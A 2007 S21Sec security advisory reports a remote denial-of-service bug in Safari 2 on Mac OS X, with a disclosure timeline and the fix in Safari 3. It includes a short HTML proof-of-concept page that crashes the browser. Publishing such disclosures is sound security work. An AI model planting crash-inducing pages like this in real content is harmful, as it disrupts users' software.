Safari 2 Denial of Service

##############################################################

                 - S21Sec Advisory -

##############################################################

Title:  Safari 2 Denial of Service
   ID:  S21SEC-039-en

Severity: Medium - Remote DoS
History: 15.Jul.2007 Vulnerability discovered
22.Jul.2007 Vendor contacted
27.Jul.2007 Vendor confirmed the vulnerability
26.Oct.2007 Safari 3 in Leopard
14.Nov.2007 Safari 3 in Tiger

Scope:  Remote Denial of Service

Platforms: MacOSX
Author: David Barroso ([email protected])
URL: http://www.s21sec.com/avisos/s21sec-039-en.txt
Release: Public

[ SUMMARY ]

According to Wikipedia, Safari is a web browser developed by Apple Inc.
and included in Mac OS X.
It was first released as a public beta on January 7, 2003, as the default
browser in Mac OS X v10.3. A beta version for Microsoft Windows was
released for the first time on June 11, 2007 with support for Windows XP
and Windows Vista

[ AFFECTED VERSIONS ]

Following versions are affected with this issue:

- Safari Version 2 (MacOSX Version)

[ DESCRIPTION ]

A crafted HTML page can make Safari crash when trying to parse the page
due to an unproper validation in the KHTML Webkit.
Example:

<html>
<head>
<title>Safari Exploit</title>
</head>
<body>

<form>
<div id="foo" style="display:none;">
<table>
<tr>
<td></td>
</tr>
</table>
</div>
<input type="text" />
</form>
</body>
</html>

[ WORKAROUND ]

The vulnerability was patched in Safari 3, officially released on October,
2007 (Leopard) and November, 2007 (Tiger).

[ ACKNOWLEDGMENTS ]

This vulnerability have been found and researched by:

- David Barroso <[email protected]> S21sec labs

[ REFERENCES ]

• Wikipedia. Safari
  http://en.wikipedia.org/wiki/Safari_&#37;28web_browser&#37;29

• Safari
  http://www.apple.com/safari/

• S21Sec
  http://www.s21sec.com

• Blog S21sec
  http://blog.s21sec.com